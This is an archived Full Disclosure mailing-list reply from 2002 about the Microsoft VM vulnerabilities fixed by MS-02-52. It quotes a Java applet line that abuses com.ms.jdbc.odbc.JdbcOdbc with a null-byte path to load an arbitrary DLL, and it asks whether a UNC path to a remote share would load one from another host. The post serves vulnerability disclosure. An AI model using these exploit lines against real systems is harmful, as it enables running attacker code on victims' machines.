Full Disclosure mailing list archives
Technical information about the vulnerabilities fixed by MS-02-52
From: guninski () guninski com (Georgi Guninski)
Date: Mon, 23 Sep 2002 18:30:58 +0300
Jouko Pynnonen wrote:
can be freely chosen by a malicious applet. For instance to load the DLL
"C:\mydll.dll" the applet can do
new com.ms.jdbc.odbc.JdbcOdbc("C:\\mydll\000");
Does
new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
work?
Georgi Guninski
Current thread:
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)